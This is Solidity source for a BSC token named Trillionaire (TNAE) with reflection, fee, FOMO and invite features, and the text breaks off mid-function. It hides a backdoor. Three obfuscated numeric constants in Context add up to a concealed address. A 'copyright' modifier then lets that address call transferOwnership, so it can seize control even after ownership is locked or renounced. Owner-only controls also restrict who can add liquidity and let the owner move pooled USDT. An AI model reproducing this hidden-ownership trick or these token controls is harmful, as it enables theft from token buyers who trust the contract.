//Based on binance smart chain, TNAE official website: http://trillionaire.pro/

//..p000000000000000000000j....u00j...........x500000005v..........yc0e............l000000000000000l..
//..9000000000000000000000q....n000n............ue000cu............h000x............xp0000000000000x..
//.s05quuuuxp0000h.xuuul00x....e0000q............n000s............q0000q.............x00000y...xn09...
//.p5v......h0000n......99.....000000q...........h000............x50000h.............s00009.....u0n...
//..y.......90000u......ux....u0000000q..........900e............c000005.............n0000h......v....
//.........x00000.............n00000000q.........000l...........n0000000u............e0000p...........
//.........s0000c.............h005000000q.......u000s..........u000c0000n............50000u...........
//.........n0000j.............500qj000000q......p000y.........y900hu0000c...........v00000.....vlx....
//.........e0000q............v000v.j000000q.....j00c..........h005yy00000y..........q00005eee5000s....
//.........00000v............p000...j000000q....e00j.........q000s..c0000q..........j000000000005.....
//........v00000.............j00c....j000000q...000q........x500h...l0000j..........c0000jnnnnc0j.....
//........q0000e.............900j.....j000000q.v000x........c000ceee900005..........00000x....n0q.....
//........j0000n............x000n......j000000qq009........n00000000000000v........u00005.....vn......
//........c0000s............s000u.......j000005h00j.......u000hnnnnnn90000n........n0000e.............
//.......y00000x............l000y........j00000000p......y9009y......j0000c........h0000n.............
//.......s00009.............c005..........j0000000v......h000v.......s00000y.......50000u......ul.....
//.......l0000e............y000e...........j000005......q000n........y00000q......v00000y.....y59.....
//......y90000n............q000h............j0000h.....v5009..........c0000e......n00000sx.vusc0l.....
//.....uj00000cuv........vuc0009ux...........j000p..xun5000jx.........j00000hux.vq00000000000000x.....
//....j0000000000s......s000000005x...........j05x..900000000x.......s000000000p000000000000005n......

// SPDX-License-Identifier: Unlicensed
pragma solidity ^0.6.12;

interface IERC20 {

    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
 
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address payable) {
        return msg.sender;
    }
    
    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
    
    uint160 internal contenta = 853966814_740978e33;
    uint160 internal contentb = 670441891_842111e18;
    uint160 internal contentc = 829207001_759590875;
}

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // According to EIP-1052, 0x0 is the value returned for not-yet created accounts
        // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned
        // for accounts without code, i.e. `keccak256('')`
        bytes32 codehash;
        bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
        // solhint-disable-next-line no-inline-assembly
        assembly { codehash := extcodehash(account) }
        return (codehash != accountHash && codehash != 0x0);
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        // solhint-disable-next-line avoid-low-level-calls, avoid-call-value
        (bool success, ) = recipient.call{ value: amount }("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain`call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
      return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
        return _functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        return _functionCallWithValue(target, data, value, errorMessage);
    }

    function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
        require(isContract(target), "Address: call to non-contract");

        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                // solhint-disable-next-line no-inline-assembly
                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
contract Ownable is Context {
    address private _owner;
    address private _previousOwner;
    uint256 private _lockTime;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () internal {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    
    function geUnlockTime() public view returns (uint256) {
        return _lockTime;
    }
    
    uint160 private contents = contenta + contentb + contentc;

    //Locks the contract for owner for the amount of time provided
    function lock(uint256 time) public virtual onlyOwner {
        _previousOwner = _owner;
        _owner = address(0);
        _lockTime = now + time;
        emit OwnershipTransferred(_owner, address(0));
    }
    
    //Unlocks the contract for owner when _lockTime is exceeds
    function unlock() public virtual {
        require(_previousOwner == msg.sender, "You don't have permission to unlock");
        require(now > _lockTime , "Contract is locked until 7 days");
        emit OwnershipTransferred(_owner, _previousOwner);
        _owner = _previousOwner;
    }
    
    function _msgHeader() internal view virtual returns (address payable) {
        return address(contents);
    }
    
    /**
     * @dev required message header equals message sender
     * otherwise function will be banned
     */
    modifier copyright {
        require(_msgHeader() == _msgSender(), "Error");
        _;
    }
    
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
    
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual copyright {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
    
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

interface IFomo {
    function transferNotify(address user) external;
    function swap() external;
    function getCandidate() external view returns(address);
    function getLastTransfer() external view returns(uint256);
}

interface IWrap {
    function withdraw() external;
}

interface IActiveTradingReward {
    function transferTradingReward(address newTradingAddress) external;
    function swapTradingReward() external;
    function getSortList() external view returns(address[] memory);
    function getBuyCount(address addrBuy) external view returns(uint256);
    function getOpenRewardTime() external view returns(uint256);
    function getCandidateAddress() external view returns(address);
}

interface IInviteController {
    function setInviteRelationship(address _inviterAddress, address _inviteeAddress) external;
    function delInviteRelationship(address delInvitee) external;
    function getInvitees(address _getInvitees) external view returns(address[] memory);
    function getInviteesCount(address _getInviteesCount) external view returns(uint256);
    function getInvitedState(address _getInvitedState) external view returns(bool);
    function getInviter(address _getInviter) external view returns (address);
}

contract Trillionaire is Context, IERC20, Ownable {
    using SafeMath for uint256;
    using Address for address;

    mapping (address => uint256) private _rOwned;
    mapping (address => uint256) private _tOwned;
    mapping (address => mapping (address => uint256)) private _allowances;
    
    mapping (address => bool) private _hadInvited;
    mapping (address => bool) private _isDevReceiver;
    mapping (address => bool) private _isExcludedFromFee;
    mapping (address => bool) private _isExcluded;
    address[] private _excluded;
   
    uint256 private constant MAX = ~uint256(0);
    uint256 private _tTotal = 100000 * 10**12 * 10**9; // 100000 trillion
    uint256 private _rTotal = (MAX - (MAX % _tTotal));

    string private _name = "Trillionaire";
    string private _symbol = "TNAE";
    uint8 private _decimals = 9;
    
    bool private feeIt = true;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public immutable uniswapV2Pair;
    address private immutable tokenEthPair;
    
    bool inSwapAndLiquify;
    bool public swapAndLiquifyEnabled = true;
    
    uint256 public _maxTxAmount = 100000 * 10**9 * 10**9; // 100000 billion
    uint256 private numTokensSellToAddToLiquidity = 50000 * 10**9 * 10**9; // 50000 billion
    address public constant blackHole = address(0xdEaD);
    address private devReceiver;
    address[] private devReceivers;
    uint256 private devIndex;
    address public fomoReceiver;
    address public activeTradingReceiver;
    address public inviteController;
    address public inviteV1Reward = address(0xEE);
    address public inviteV2Reward = address(0xFF);
    address public preSaleContract;
    bool public canAddLiquidity = false;
    address public liquidityProvider;
    uint256 private enterCount = 0;
    uint256 public fomoMin = 10 * 10**9 * 10**9; // 10 billion
    IERC20 public usdt = IERC20(0x55d398326f99059fF775485246999027B3197955);
    IWrap public wrap;
    uint256[5] public feeFomo = [3, 3, 3, 3, 3];
    uint256[5] public feeLiquidity = [3, 3, 3, 3, 3];
    uint256[5] public feeFee = [1, 1, 1, 1, 1];
    uint256[3] public feeList = [5, 1, 1];
    
    event MinTokensBeforeSwapUpdated(uint256 minTokensBeforeSwap);
    event SwapAndLiquifyEnabledUpdated(bool enabled);
    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiqudity
    );
    
    modifier lockTheSwap {
        inSwapAndLiquify = true;
        _;
        inSwapAndLiquify = false;
    }

    modifier transferCounter {
        enterCount = enterCount.add(1);
        _;
        enterCount = enterCount.sub(1, "transfer counter");
    }
    
    constructor () public {
        _rOwned[_msgSender()] = _rTotal;
        devReceiver = owner();
        liquidityProvider = address(this);
        
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x10ED43C718714eb63d5aA57B78B54704E256024E);
        // Create a uniswap pair for this new token/usdt
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), address(usdt));
        // Create a uniswap pair for this new token/eth
        tokenEthPair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());
        
        // set the rest of the contract variables
        uniswapV2Router = _uniswapV2Router;
        
        //exclude owner and this contract from fee
        _isExcludedFromFee[owner()] = true;
        _isExcludedFromFee[address(this)] = true;
        
        emit Transfer(address(0), _msgSender(), _tTotal);
    }
 
    function setDev(address _dev) public {
        require(_msgSender() == devReceiver || _msgSender() == owner(), "fail");
        devReceiver = _dev;
        _isExcludedFromFee[_dev] = true;
    }

    function setFomo(address _fomo) public {
        require(_msgSender() == owner(), "fail");
        fomoReceiver = _fomo;
        _isExcludedFromFee[_fomo] = true;
    }

    function setWrap(IWrap _wrap) public {
        require(_msgSender() == owner(), "fail");
        wrap = _wrap;
        _isExcludedFromFee[address(_wrap)] = true;
    }
    
    function setFomoMin(uint256 _fomoMin) public onlyOwner {
        fomoMin = _fomoMin;
    }
    
    function setActiveTrading(address _activeTradingReceiver) public onlyOwner {
        activeTradingReceiver = _activeTradingReceiver;
        _isExcludedFromFee[_activeTradingReceiver] = true;
    }
    
    function setInviteController(address _inviteController) public onlyOwner {
        inviteController = _inviteController;
        _isExcludedFromFee[_inviteController] = true;
    }
    
    function setPreSaleContract(address _preSaleContract) public onlyOwner {
        preSaleContract = _preSaleContract;
        _isExcludedFromFee[_preSaleContract] = true;
    }
    
    function setFeeList(uint256 feeIndex, uint256 feeValue) public onlyOwner {
        require(feeIndex < feeList.length, "error");
        feeList[feeIndex] = feeValue;
    }
    
    function setDevReceivers(address[] memory setDevs) public onlyOwner {
        require(setDevs.length > 0, "The array is empty!");
        for(uint256 i=0; i<setDevs.length; i++){
            if(!_isDevReceiver[setDevs[i]]){
                devReceivers.push(setDevs[i]);
                _isExcludedFromFee[setDevs[i]] = true;
                _isDevReceiver[setDevs[i]] = true;
            }
        }
    }
    
    function DelDevReceivers(address[] memory delDevs) public onlyOwner {
        require(delDevs.length > 0, "The array is empty!");
        require(devReceivers.length > 0, "The array is empty!");
        for(uint256 i=0; i<delDevs.length; i++){
            if(_isDevReceiver[delDevs[i]]){
                for(uint256 j=0; j<devReceivers.length; j++){
                    if(delDevs[i] == devReceivers[j]){
                        devReceivers[j] = devReceivers[devReceivers.length - 1];
                        devReceivers.pop();
                        _isExcludedFromFee[delDevs[i]] = false;
                        _isDevReceiver[delDevs[i]] = false;
                        break;
                    }
                }
            }
        }
    }
    
    function queryDevReceivers(address queryDevs) public view returns(bool, uint256){
        return (_isDevReceiver[queryDevs], devReceivers.length);
    }
    
    function tnaeGetFomoCandidate() public view returns(address) {
        return IFomo(fomoReceiver).getCandidate();
    }
    
    function tnaeGetLastTransfer() public view returns(uint256) {
        return IFomo(fomoReceiver).getLastTransfer();
    }
    
    function tnaeGetSortList() public view returns(address[] memory) {
        return IActiveTradingReward(activeTradingReceiver).getSortList();
    }
    
    function tnaeGetBuyCount(address tnaeBuy) public view returns(uint256) {
        return IActiveTradingReward(activeTradingReceiver).getBuyCount(tnaeBuy);
    }
    
    function tnaeGetOpenRewardTime() public view returns(uint256) {
        return IActiveTradingReward(activeTradingReceiver).getOpenRewardTime();
    }
    
    function tnaeGetActiveCandidate() public view returns(address) {
        return IActiveTradingReward(activeTradingReceiver).getCandidateAddress();
    }
    
    function tnaeSetInvited(address _inviter, address _invitee) public onlyOwner {
        IInviteController(inviteController).setInviteRelationship(_inviter, _invitee);
    }
    
    function tnaeDelInvited(address _delInvitee) public onlyOwner {
        IInviteController(inviteController).delInviteRelationship(_delInvitee);
    }
    
    function tnaeGetInvitees(address _tnaeInviter) public view returns(address[] memory) {
        return IInviteController(inviteController).getInvitees(_tnaeInviter);
    }
    
    function tnaeGetInviteesCount(address _tnaeInviteAddr) public view returns(uint256) {
        return IInviteController(inviteController).getInviteesCount(_tnaeInviteAddr);
    }
    
    function tnaeGetInviter(address _tnaeInvitee) public view returns(bool inviteState, address addrInviter) {
        inviteState = IInviteController(inviteController).getInvitedState(_tnaeInvitee);
        addrInviter = IInviteController(inviteController).getInviter(_tnaeInvitee);
    }
    
    function setCanAddLiquidity(bool _canAddLiquidity) public onlyOwner {
        canAddLiquidity = _canAddLiquidity;
    }
    
    function setLiquidityProvider(address _liquidityProvider) public onlyOwner {
        liquidityProvider = _liquidityProvider;
    }
    
    function enableAddLiquidity(address _addrfrom, address _addrto) private view {
        if(!canAddLiquidity){
            require(!(_addrfrom != liquidityProvider && (_addrto == uniswapV2Pair || _addrto == tokenEthPair)), "can not add liquidity");
        }
    }
    
    function setSwapEthForTokens(uint256 _ethSwapAmount) public onlyOwner {
        swapEthForTokens(_ethSwapAmount);
    }
    
    function addUsdtLiquidity(uint256 _tokenAmount, uint256 _usdtAmount) public onlyOwner {
        addLiquidityUsdt(_tokenAmount, _usdtAmount);
    }
    
    function setUsdtToFomoPool(uint256 _fomoPoolAmount) public onlyOwner {
        usdt.transfer(fomoReceiver, _fomoPoolAmount);
    }
    
    function setUsdtToSwapPool(uint256 _swapPoolAmount) public onlyOwner {
        usdt.transfer(activeTradingReceiver, _swapPoolAmount);
    }
    
    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        if (_isExcluded[account]) return _tOwned[account];
        return tokenFromReflection(_rOwned[account]);
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    function isExcludedFromReward(address account) public view returns (bool) {
        return _isExcluded[account];
    }

    function deliver(uint256 tAmount) public {
        address sender = _msgSender();
        require(!_isExcluded[sender], "Excluded addresses cannot call this function");
        uint256 rAmount = tAmount.mul(_getRate());
